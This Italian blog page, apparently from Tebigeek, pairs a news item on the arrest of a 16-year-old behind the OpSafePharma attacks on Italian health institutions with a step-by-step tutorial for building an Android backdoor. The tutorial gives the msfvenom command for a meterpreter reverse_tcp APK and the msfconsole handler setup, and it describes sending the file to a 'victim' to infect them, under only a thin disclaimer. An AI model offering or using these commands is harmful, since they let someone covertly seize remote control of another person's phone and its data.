Articoli

Opsafepharma: Arrestato hacker 16enne

Udine – Polizia postale arresta il responsabile della campagna Opsafepharma

Arrestato giovane di 16 anni nella provincia di UdineArtek, così si faceva chiamare all’interno nei meandri del web. La campagna diramata il 16 di Marzo (Opsafepharma) che aveva come obiettivi principali numerosi istituti italiani, i quali adoperano all’interno della sanità, è stata placata dalla polizia postale.anonymous opsafepharma

Tra gli istituti colpiti all’interno del suolo italiano abbiamo:

  • L’istituto superiore della sanità,
  • Il Ministero della Salute
  • Le aziende sanitarie locali (ASL) di numerose Regioni

Il movente, ovvero la lenta prassi della Sanità italiana in materia di “Disturbo da deficit di attenzione/iperattività“, ha coinvolto nella protesta numerosi partecipanti.

Opsafepharma: Ecco cosa è successo

Attenzione: Tebigeek non vuole dire cosa sia giusto o sbagliato. Le riflessioni presenti, anche se di piccola dimensione, non hanno lo scopo di influenzare i vostri ideali.

L’operazione OpSafePharma nelle ultime ore sta avendo un solo nome: Artek. Egli è riuscito a penetrare e ad abbattere molti degli istituti sanitari presenti nel suolo italiano.

Gli attacchi effettuati sono di diversa natura, a partire dal DDoS. Acronimo di “Denial Of Service“, in questo campo è  solitamente un attacco volontario che ha lo scopo di esaurire tutte le risorse, come ad esempio su un web server.
Questo tipo di azione ha permesso di rendere non usabili i vari servizi forniti dallo stato, causando ovviamente disagio.

L’altro tipo di offensiva accennata dalle forze dell’ordine è la SQL Injection. Questo tipo di attacco, viene impiegato su applicazioni che fanno utilizzo di un DBMS SQL.
Permette di inserire all’interno di un’interrogazione al server costruita male, del codice maligno, dove il programmatore riesce ad entrare all’interno di aree riservate.
Quindi questo ha permesso al ragazzo di recuperare dati sensibili, i quali sono stati anche pubblicati.

Dove sono finiti i dati?

La polizia ha prontamente perquisito la casa del ragazzo, keyboard opsafepharmasequestrandogli tutto il materiale informatico incriminato e mettendolo in mano agli investigatori, in quanto i dati contenuti sono criptati.

Come creare una BackDoor per Android con Linux

Come creare una BackDoor
per Android con Linux

Oggi andremo a vedere come creare una BackDoor per Android con Linux in pochi e semplici passi.

Come creare una BackDoor per Android con LinuxMolte persone per controllare un dispositivo Android da remoto usa il noto Tool “AndroRat”. Ma siccome a noi di Tebigeek non piace la la “Pappa pronta” andremo a vedere come crearci il nostro RAT con qualsiasi distribuzione Linux!

Questa guida ricordiamo che è solo a scopo illustrativo per testare i vostri dispositivi e non per infettare altri. Tebigeek non si assume nessuna responsabilità dell’uso che ne farete.

Requisiti:

Una distribuzione Linux (BackBox, Kali, Parrot ecc…)
Framework Metasploit (Già presente nelle distribuzioni Linux dedicate ai Pen Test, come Kali Linux)
Un dispositivo Android

In questa guida userò BackBox.

Step 1: Creare il Payload!

Apriamo il terminale su BackBox
Utilizziamo Metasploit per creare l’exploit

msfvenom -p  android/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=1604 R >
 /home/the_boss_/Scrivania/Hack.apk

Screen 1

Una volta eseguito il comando avremo un file Hack.apk da inviare alla vittima per infettarla.

Step 2: Impostazioni Connessione

Adesso bisogna predisporre la nostra macchina ad una connessione di tipo reverse_tcp con questi comandi:

msfconsole

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

A questo punto inseriamo i parametri associati al nostro scenario, con questi comandi in fila:

set lhost 192.168.1.6 –> Indirizzo IP dell'attaccante
set lport 1604 –> porta su cui ascoltare per connessione in entrata (assicurarsi
che la porta sia aperta)
exploit –> Avviamo l'ascolto in attesa di connessioni in entrata

Screen 2

 

 

 

 

Quando installeremo l’APK sul dispositivo nel terminale vedremo la connessione in ascolto.

 

Arrivati a questo punto siete riusciti ad infettare la vostra vittima, vi consiglio di provare solo in locale su dispositivi di vostra proprietà per evitare eventuali problemi, anche perchè io e Tebigeek non ci assumiamo nessuna responsabilità come vi ho già detto all’inizio.